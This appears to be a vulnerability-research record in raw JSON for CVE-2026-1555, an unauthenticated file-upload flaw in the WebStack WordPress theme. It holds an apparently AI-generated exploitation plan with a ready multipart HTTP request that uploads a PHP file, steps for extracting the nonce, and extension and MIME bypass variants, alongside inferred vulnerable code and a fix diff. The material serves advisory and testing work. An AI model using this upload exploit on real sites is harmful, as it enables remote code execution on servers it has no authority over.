[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAElJ2wVAWu9uR-jF4p6z-9wFN-R-ENY7Lf5uSkaaJZ4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":8,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":8,"patch_diff_files":19,"patch_trac_url":8,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":8,"poc_status":8,"poc_video_id":8,"poc_summary":8,"poc_steps":8,"poc_tested_at":8,"poc_wp_version":8,"poc_php_version":8,"poc_playwright_script":8,"poc_exploit_code":8,"poc_has_trace":21,"poc_model_used":8,"poc_verification_depth":8,"source_links":31},"CVE-2026-1555","webstack-unauthenticated-arbitrary-file-upload","WebStack \u003C= 1.2024 - Unauthenticated Arbitrary File Upload","The WebStack theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the io_img_upload() function in all versions up to, and including, 1.2024. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.",null,"webstack","\u003C=1.2024","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-14 14:52:49","2026-04-15 03:37:20",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb97805de-1b47-4c9f-baae-2e37c1b78570?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1555 (WebStack Theme Unauthenticated Arbitrary File Upload)\n\n## 1. Vulnerability Summary\nThe WebStack theme for WordPress (versions \u003C= 1.2024) contains a critical unauthenticated arbitrary file upload vulnerability. The flaw resides in the `io_img_upload()` function, which lacks proper file type validation and is accessible to unauthenticated users via WordPress AJAX handlers. An attacker can upload a malicious PHP script and execute it, leading to Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `io_img_upload` (inferred from function name)\n- **HTTP Method:** `POST`\n- **Authentication:** Unauthenticated (`wp_ajax_nopriv_` hook)\n- **Vulnerable Parameter:** The file input (typically within the `$_FILES` array).\n- **Preconditions:** The WebStack theme must be active.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A request is sent to `\u002Fwp-admin\u002Fadmin-ajax.php?action=io_img_upload`.\n2. **Hook Registration:** The theme registers the action:\n   `add_action('wp_ajax_nopriv_io_img_upload', 'io_img_upload');`\n   `add_action('wp_ajax_io_img_upload', 'io_img_upload');`\n3. **Execution:** The `io_img_upload()` function is called.\n4. **Processing:**\n   - The function likely retrieves file data from `$_FILES`.\n   - It may perform minor checks (like file size) but fails to validate the extension or MIME type against a whitelist of safe images.\n5. **Sink:** The file is saved to the filesystem using `move_uploaded_file()` or `wp_handle_upload()` without filtering for dangerous extensions like `.php`.\n\n## 4. Nonce Acquisition Strategy\nWhile many \"unauthenticated\" vulnerabilities in themes lack nonce checks entirely, the WebStack theme might implement one for AJAX.\n\n1. **Search for Nonce Registration:**\n   The agent should search for where the nonce is created in the theme:\n   `grep -rn \"wp_create_nonce\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`\n2. **Identify JS Localization:**\n   Look for `wp_localize_script` to find the JavaScript variable:\n   `grep -rn \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`\n3. **Browser Extraction:**\n   - If a nonce is required (e.g., `check_ajax_referer('io_img_upload', 'nonce')` is found in the code), the agent must find a page that enqueues the relevant script.\n   - Navigate to the homepage or a specific page (like a submission form) using `browser_navigate`.\n   - Execute: `browser_eval(\"window.theme_vars?.nonce\")` (Replace `theme_vars` with the actual identifier found in step 2).\n\n*Note: If `check_ajax_referer` is missing or called with `die=false` without a subsequent return, the nonce can be omitted or spoofed.*\n\n## 5. Exploitation Strategy\nThe goal is to upload a PHP shell via the AJAX endpoint.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `multipart\u002Fform-data`\n- **Parameters:**\n    - `action`: `io_img_upload`\n    - `_ajax_nonce`: `[NONCE_VALUE]` (if required)\n    - `file` (or `img_file`): A file named `shell.php` containing `\u003C?php phpinfo(); ?>`.\n\n**Payload Crafting (Example):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123\n\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"action\"\n\nio_img_upload\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\nContent-Type: application\u002Fx-httpd-php\n\n\u003C?php echo \"VULNERABLE: \" . __FILE__; ?>\n------WebKitFormBoundaryABC123--\n```\n\n**Expected Response:**\nA JSON response or string containing the URL of the uploaded file, usually located in `wp-content\u002Fuploads\u002F`.\n\n## 6. Test Data Setup\n1. **Install Theme:** Ensure the WebStack theme (version \u003C= 1.2024) is installed and activated.\n   `wp theme activate webstack`\n2. **Configure Permissions:** Ensure the `wp-content\u002Fuploads` directory is writable (standard in WordPress).\n\n## 7. Expected Results\n1. The server responds with a `200 OK` and (ideally) the path to the uploaded file.\n2. Navigating to the uploaded file's URL executes the PHP code.\n\n## 8. Verification Steps\n1. **Check Filesystem:** Confirm the file exists using WP-CLI.\n   `wp eval \"echo file_exists(wp_upload_dir()['basedir'] . '\u002Fpoc.php');\"`\n2. **Search for File:** If the location is randomized:\n   `find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F -name \"poc.php\"`\n3. **Remote Execution Check:**\n   Use `http_request` to GET the uploaded file's URL and check for the string \"VULNERABLE\".\n\n## 9. Alternative Approaches\n- **Extension Bypass:** If there is a weak check (e.g., regex), try `poc.php.jpg`, `poc.phtml`, or `poc.php5`.\n- **MIME Type Spoofing:** Change the `Content-Type` header in the multipart request to `image\u002Fjpeg` while keeping the `.php` extension.\n- **Null Byte (If PHP \u003C 5.3):** Try `poc.php%00.jpg`.\n- **Action Discovery:** If `io_img_upload` is incorrect, grep the theme for `wp_ajax_nopriv_` to find all unauthenticated entry points.\n  `grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fthemes\u002Fwebstack\u002F`","The WebStack theme for WordPress (versions \u003C= 1.2024) is vulnerable to unauthenticated arbitrary file uploads via the io_img_upload AJAX action. This occurs because the io_img_upload() function fails to validate file extensions or MIME types, allowing attackers to upload PHP scripts and achieve Remote Code Execution (RCE).","\u002F\u002F Inferred registration of the AJAX action in theme functions\nadd_action('wp_ajax_nopriv_io_img_upload', 'io_img_upload');\nadd_action('wp_ajax_io_img_upload', 'io_img_upload');\n\n\u002F\u002F Inferred vulnerable function structure lacking validation\nfunction io_img_upload() {\n    $file = $_FILES['file'];\n    $upload_overrides = array( 'test_form' => false );\n    $movefile = wp_handle_upload( $file, $upload_overrides );\n\n    if ( $movefile && ! isset( $movefile['error'] ) ) {\n        echo json_encode(array('status' => 1, 'data' => $movefile['url']));\n    }\n    die();\n}","--- a\u002Ffunctions.php\n+++ b\u002Ffunctions.php\n@@ -1,5 +1,10 @@\n function io_img_upload() {\n+    if ( ! check_ajax_referer( 'io_nonce', 'nonce', false ) ) {\n+        wp_send_json_error( 'Invalid nonce' );\n+    }\n     $file = $_FILES['file'];\n-    $upload_overrides = array( 'test_form' => false );\n+    $upload_overrides = array(\n+        'test_form' => false,\n+        'mimes'     => array( 'jpg|jpeg|jpe' => 'image\u002Fjpeg', 'gif' => 'image\u002Fgif', 'png' => 'image\u002Fpng' ),\n+    );\n     $movefile = wp_handle_upload( $file, $upload_overrides );","1. Endpoint: Target the \u002Fwp-admin\u002Fadmin-ajax.php endpoint with a POST request.\n2. Action: Include the 'action' parameter set to 'io_img_upload'.\n3. Nonce: If a nonce check is active, extract the required nonce value from the frontend's localized JavaScript variables (e.g., searching for 'wp_localize_script' data in the page source).\n4. Payload: Construct a multipart\u002Fform-data request containing a file field (e.g., 'file') with a malicious PHP payload (e.g., \u003C?php phpinfo(); ?>) and a .php extension.\n5. Execution: Parse the JSON response to find the 'data' or 'url' key, then navigate to the provided URL in the wp-content\u002Fuploads\u002F directory to trigger the uploaded PHP script.","gemini-3-flash-preview","2026-04-16 15:44:34","2026-04-16 15:44:51",{"type":32,"vulnerable_version":8,"fixed_version":8,"vulnerable_browse":8,"vulnerable_zip":8,"fixed_browse":8,"fixed_zip":8,"all_tags":33},"theme","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fwebstack"]